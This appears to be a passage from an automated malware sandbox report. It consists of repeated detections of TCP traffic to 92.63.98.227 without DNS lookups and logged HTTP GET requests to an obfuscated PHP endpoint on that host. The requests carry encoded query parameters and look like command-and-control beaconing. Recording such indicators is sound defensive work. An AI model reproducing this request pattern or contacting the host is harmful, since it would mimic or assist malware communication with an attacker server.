            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: unknownTCP traffic detected without corresponding DNS query: 92.63.98.227
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&9uruRJY5g5=IAnyS9b03NXXhs5T9XXpeBele&beuHnDzuhvZR4ed0=EmX&CW0ZiI=TGgCTxi7G HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&EF2LbGexCHI8Z7Jo=b0ysiqYJ8wKaTOIDjK5xIcrgA HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&LCTkyAhxuXJBDwmHP=RoIClfDarmNAWQEsEcAxbfeAz&AD=C45cXmCXIbxhYS4ktB27U&KGcUwJINkf9vpsRi9oBV5BN=CNkaF9HGT HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&jWuthqr2gk0znqD0XpU5dVbIV=LcKtcNjCoqPPl6PzuBYMUCxL HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
